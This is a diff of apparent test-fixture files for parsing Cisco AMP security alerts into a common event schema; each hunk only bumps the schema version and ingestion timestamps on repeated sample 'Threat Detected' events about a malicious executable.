                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -91,7 +91,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -117,7 +117,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581713543Z",
+                "ingested": "2021-09-13T18:06:53.271892093Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -174,7 +174,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -200,7 +200,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581715796Z",
+                "ingested": "2021-09-13T18:06:53.271894245Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -257,7 +257,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -283,7 +283,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581730632Z",
+                "ingested": "2021-09-13T18:06:53.271896176Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -340,7 +340,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -366,7 +366,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581733039Z",
+                "ingested": "2021-09-13T18:06:53.271898088Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -423,7 +423,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -449,7 +449,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581734917Z",
+                "ingested": "2021-09-13T18:06:53.271900010Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -506,7 +506,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -532,7 +532,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581736759Z",
+                "ingested": "2021-09-13T18:06:53.271901953Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -589,7 +589,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -615,7 +615,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581738562Z",
+                "ingested": "2021-09-13T18:06:53.271903942Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -672,7 +672,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -698,7 +698,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581740367Z",
+                "ingested": "2021-09-13T18:06:53.271905830Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -755,7 +755,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -781,7 +781,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581742294Z",
+                "ingested": "2021-09-13T18:06:53.271907735Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -838,7 +838,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -864,7 +864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581744207Z",
+                "ingested": "2021-09-13T18:06:53.271909623Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -921,7 +921,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -947,7 +947,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581746351Z",
+                "ingested": "2021-09-13T18:06:53.271911811Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1004,7 +1004,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1030,7 +1030,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581748237Z",
+                "ingested": "2021-09-13T18:06:53.271913736Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1087,7 +1087,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1113,7 +1113,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581750120Z",
+                "ingested": "2021-09-13T18:06:53.271915654Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1170,7 +1170,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1196,7 +1196,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581752005Z",
+                "ingested": "2021-09-13T18:06:53.271917544Z",
